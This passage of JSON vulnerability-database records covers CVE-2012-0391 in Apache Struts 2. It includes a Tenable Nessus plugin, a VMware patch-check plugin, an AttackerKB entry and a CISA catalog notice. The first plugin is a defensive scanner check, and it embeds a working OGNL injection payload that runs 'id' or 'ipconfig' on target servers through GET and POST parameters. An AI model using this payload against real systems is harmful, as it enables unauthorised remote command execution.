\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-08-07T00:00:00", "type": "nessus", "title": "Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/69240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69240);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-0391\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/21\");\n\n script_name(english:\"Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to an error in the way that the ExceptionDelegator\ncomponent handles mismatched data types, an unauthenticated, remote\nattacker can execute arbitrary commands on the remote host by sending\na specially crafted request order. This flaw is due to the\nExceptionDelegator interpreting parameter values as OGNL expressions\nwhen there is a conversion error. 
\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?828dc6d2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-008.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.2.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0391\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"D2ExploitPack\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 
10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\nforeach url (urls)\n{\n # Grab CGI arguments for each .action file from KB\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n\n foreach cmd (cmds)\n {\n attack = \"\";\n exploit = \"'+(#_memberAccess[\" + '\"allowStaticMethodAccess\"]=true,' +\n \"@java.lang.Runtime@getRuntime().exec('\" + cmd + \"'))+'\";\n\n # Build a string with all CGI arguments set to the exploit string\n foreach arg (cgi_args)\n {\n attack += arg + \"=\" + exploit + \"&\";\n }\n attack = ereg_replace(string:attack, pattern:\"&$\", replace:\"\");\n attack_url = url + \"?\" + attack;\n\n # Try testing with GET first\n # attack_url should look like this example :\n # /dir/blah.action?param='+(#memberAccess[\"allowStaticMethodAccess\"]=true,\n # @java.lang.Runtime@getRuntime().exec('id'))+'\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (res[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n output = res[2];\n break;\n }\n\n # Else try testing with POST\n attack_post = urlencode(\n str : attack,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=&_.\"\n );\n\n res2 = http_send_recv3(\n method : \"POST\",\n item : url,\n data : attack_post,\n port : port,\n add_headers : make_array(\"Content-Type\",\n \"application/x-www-form-urlencoded\"),\n exit_on_fail : TRUE\n );\n\n if (res2[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = http_last_sent_request();\n output = res2[2];\n break;\n }\n }\n # Stop after first vulnerable 
Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : chomp(output)\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:52:35", "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31\n\n The Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.\n\nb. vCenter Update Manager update to JRE 1.5.0 Update 36\n\n The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple security issues. Oracle has documented the CVE identifiers that are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical Patch Update Advisory for June 2012.\n\nc. Update to ESX/ESXi userworld OpenSSL library\n\n The ESX/ESXi userworld OpenSSL library is updated from version 0.9.8p to version 0.9.8t to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-4180, CVE-2010-4252, CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.\n\nd. Update to ESX service console OpenSSL RPM\n\n The service console OpenSSL RPM is updated to version 0.9.8e-22.el5_8.3 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-2110 to this issue.\n\ne. 
Update to ESX service console kernel\n\n The ESX service console kernel is updated to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2011-1833, CVE-2011-2484, CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363, CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324, CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583 to these issues.\n\nf. Update to ESX service console Perl RPM\n\n The ESX service console Perl RPM is updated to perl-5.8.8.32.1.8999.vmw to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-2761, CVE-2010-4410, and CVE-2011-3597 to these issues.\n\ng. Update to ESX service console libxml2 RPMs\n\n The ESX service console libxml2 RPMs are updated to libxml2-2.6.26-2.1.15.el5_8.2 and libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0841 to this issue.\n\nh. Update to ESX service console glibc RPM\n\n The ESX service console glibc RPM is updated to version glibc-2.5-81.el5_8.1 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-5029, CVE-2009-5064, CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864 to these issues.\n\ni. Update to ESX service console GnuTLS RPM\n\n The ESX service console GnuTLS RPM is updated to version 1.4.1-7.el5_8.2 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2011-4128, CVE-2012-1569, and CVE-2012-1573 to these issues.\n\nj. 
Update to ESX service console popt, rpm, rpm-libs, and rpm-python RPMS\n\n The ESX service console popt, rpm, rpm-libs, and rpm-python RPMS are updated to the following versions to resolve multiple security issues:\n - popt-1.10.2.3-28.el5_8\n - rpm-4.4.2.3-28.el5_8\n - rpm-libs-4.4.2.3-28.el5_8\n - rpm-python-4.4.2.3-28.el5_8\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2012-0060, CVE-2012-0061, and CVE-2012-0815 to these issues.\n\nk. Vulnerability in third-party Apache Struts component\n\n The version of Apache Struts in vCenter Operations has been updated to 2.3.4, which addresses an arbitrary file overwrite vulnerability. This vulnerability allows an attacker to create a denial of service by overwriting arbitrary files without authentication. The attacker would need to be on the same network as the system where vCOps is installed.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-0393 to this issue.\n\n Note: Apache Struts 2.3.4 addresses the following issues as well:\n CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0394. 
It was found that these do not affect vCOps.\n\n VMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue to us.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"}, "published": "2012-08-31T00:00:00", "type": "nessus", "title": "VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", "CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2011-5057", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394", "CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1", "cpe:/o:vmware:esxi:4.1", "cpe:/o:vmware:esxi:5.0"], "id": "VMWARE_VMSA-2012-0013.NASL", "href": "https://www.tenable.com/plugins/nessus/61747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2012-0013. 
\n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61747);\n script_version(\"1.57\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2010-2761\", \"CVE-2010-4180\", \"CVE-2010-4252\", \"CVE-2010-4410\", \"CVE-2011-0014\", \"CVE-2011-1020\", \"CVE-2011-1089\", \"CVE-2011-1833\", \"CVE-2011-2484\", \"CVE-2011-2496\", \"CVE-2011-2699\", \"CVE-2011-3188\", \"CVE-2011-3209\", \"CVE-2011-3363\", \"CVE-2011-3597\", \"CVE-2011-4108\", \"CVE-2011-4109\", \"CVE-2011-4110\", \"CVE-2011-4128\", \"CVE-2011-4132\", \"CVE-2011-4324\", \"CVE-2011-4325\", \"CVE-2011-4576\", \"CVE-2011-4577\", \"CVE-2011-4609\", \"CVE-2011-4619\", \"CVE-2012-0050\", \"CVE-2012-0060\", \"CVE-2012-0061\", \"CVE-2012-0207\", \"CVE-2012-0393\", \"CVE-2012-0815\", \"CVE-2012-0841\", \"CVE-2012-0864\", \"CVE-2012-1569\", \"CVE-2012-1573\", \"CVE-2012-1583\", \"CVE-2012-2110\");\n script_bugtraq_id(40063, 44199, 45145, 45163, 45164, 46264, 46567, 46740, 47321, 48383, 48802, 49108, 49289, 49626, 49911, 50311, 50609, 50663, 50755, 50798, 50898, 51194, 51257, 51281, 51343, 51366, 51439, 51467, 51563, 52009, 52010, 52011, 52012, 52013, 52014, 52015, 52016, 52017, 52018, 52019, 52020, 52107, 52161, 52201, 52667, 52668, 52865, 53136, 53139, 53158, 53946, 53947, 53948, 53949, 53950, 53951, 53952, 53953, 53954, 53956, 53958, 53959, 53960);\n script_xref(name:\"VMSA\", value:\"2012-0013\");\n\n script_name(english:\"VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote VMware ESXi / ESX host is missing one or more\nsecurity-related patches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"a. 
vCenter and ESX update to JRE 1.6.0 Update 31\n\n The Oracle (Sun) JRE is updated to version 1.6.0_31, which\n addresses multiple security issues. Oracle has documented the\n CVE identifiers that are addressed by this update in the Oracle\n Java SE Critical Patch Update Advisory of February 2012.\n\nb. vCenter Update Manager update to JRE 1.5.0 Update 36\n\n The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple\n security issues. Oracle has documented the CVE identifiers that\n are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical\n Patch Update Advisory for June 2012.\n\nc. Update to ESX/ESXi userworld OpenSSL library\n\n The ESX/ESXi userworld OpenSSL library is updated from version\n 0.9.8p to version 0.9.8t to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-4180, CVE-2010-4252,\n CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576,\n CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.\n\nd. Update to ESX service console OpenSSL RPM\n\n The service console OpenSSL RPM is updated to version\n 0.9.8e-22.el5_8.3 to resolve a security issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-2110 to this issue.\n\ne. Update to ESX service console kernel\n\n The ESX service console kernel is updated to resolve multiple\n security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2011-1833, CVE-2011-2484,\n CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363,\n CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324,\n CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583\n to these issues.\n\nf. 
Update to ESX service console Perl RPM\n\n The ESX service console Perl RPM is updated to\n perl-5.8.8.32.1.8999.vmw to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-2761, CVE-2010-4410, and\n CVE-2011-3597 to these issues.\n\ng. Update to ESX service console libxml2 RPMs\n\n The ESX service console libmxl2 RPMs are updated to\n libxml2-2.6.26-2.1.15.el5_8.2 and\n libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security\n issue.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-0841 to this issue.\n\nh. Update to ESX service console glibc RPM\n\n The ESX service console glibc RPM is updated to version\n glibc-2.5-81.el5_8.1 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2009-5029, CVE-2009-5064,\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864\n to these issue.\n\ni. Update to ESX service console GnuTLS RPM\n\n The ESX service console GnuTLS RPM is updated to version\n 1.4.1-7.el5_8.2 to resolve multiple security issues.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2011-4128, CVE-2012-1569, and\n CVE-2012-1573 to these issues.\n\nj. Update to ESX service console popt, rpm, rpm-libs,\n and rpm-python RPMS\n\n The ESX service console popt, rpm, rpm-libs, and rpm-python RPMS\n are updated to the following versions to resolve multiple\n security issues :\n - popt-1.10.2.3-28.el5_8\n - rpm-4.4.2.3-28.el5_8\n - rpm-libs-4.4.2.3-28.el5_8\n - rpm-python-4.4.2.3-28.el5_8\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2012-0060, CVE-2012-0061, and\n CVE-2012-0815 to these issues.\n\nk. 
Vulnerability in third-party Apache Struts component\n\n The version of Apache Struts in vCenter Operations has been\n updated to 2.3.4 which addresses an arbitrary file overwrite\n vulnerability. This vulnerability allows an attacker to create\n a denial of service by overwriting arbitrary files without\n authentication. The attacker would need to be on the same network\n as the system where vCOps is installed.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n assigned the name CVE-2012-0393 to this issue.\n\n Note: Apache struts 2.3.4 addresses the following issues as well :\n CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0394. It\n was found that these do not affect vCOps.\n\n VMware would like to thank Alexander Minozhenko from ERPScan for\n reporting this issue to us.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2012/000197.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Field Bytecode Verifier Cache Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2012-08-30\");\nflag = 0;\n\n\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201209401-SG\",\n patch_updates : make_list(\"ESX400-201302401-SG\", \"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201209402-SG\",\n patch_updates : make_list(\"ESX400-201305404-SG\", \"ESX400-201310402-SG\")\n )\n) flag++;\nif (esx_check(ver:\"ESX 4.0\", patch:\"ESX400-201209404-SG\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : 
\"ESX410-201208101-SG\",\n patch_updates : make_list(\"ESX410-201211401-SG\", \"ESX410-201301401-SG\", \"ESX410-201304401-SG\", \"ESX410-201307401-SG\", \"ESX410-201312401-SG\", \"ESX410-201404401-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208102-SG\",\n patch_updates : make_list(\"ESX410-201301405-SG\", \"ESX410-201304402-SG\", \"ESX410-201307405-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208103-SG\",\n patch_updates : make_list(\"ESX410-201307403-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208104-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208105-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208106-SG\",\n patch_updates : make_list(\"ESX410-201307404-SG\", \"ESX410-Update03\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201208107-SG\",\n patch_updates : make_list(\"ESX410-Update03\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.1\",\n patch : \"ESXi410-201208101-SG\",\n patch_updates : make_list(\"ESXi410-201211401-SG\", \"ESXi410-201301401-SG\", \"ESXi410-201304401-SG\", \"ESXi410-201307401-SG\", \"ESXi410-201312401-SG\", \"ESXi410-201404401-SG\", \"ESXi410-Update03\")\n )\n) flag++;\n\nif (esx_check(ver:\"ESXi 5.0\", vib:\"VMware:esx-base:5.0.0-1.25.912577\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-05-06T08:35:01", "description": "The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL 
expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.\n\n**Recent assessments:**\n\nAssessed Attacker Value: 0\n", "cvss3": {}, "published": "2012-01-08T00:00:00", "type": "attackerkb", "title": "CVE-2012-0391", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0391"], "modified": "2020-07-30T00:00:00", "id": "AKB:31890548-3E0B-40EF-84B2-B9CBDC95596A", "href": "https://attackerkb.com/topics/xU2Ap2yNUC/cve-2012-0391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-01-26T11:31:12", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. 
These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2006-1547 | Apache Struts 1 ActionForm Denial of Service Vulnerability | 07/21/2022 \nCVE-2012-0391 | Apache Struts 2 Improper Input Validation Vulnerability | 07/21/2022 \nCVE-2018-8453 | Microsoft Windows Win32k Privilege Escalation Vulnerability | 07/21/2022 \nCVE-2021-35247 | SolarWinds Serv-U Improper Input Validation Vulnerability | 02/04/2022 \n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. 
CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-01-21T00:00:00", "type": "cisa", "title": "CISA Adds Four Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 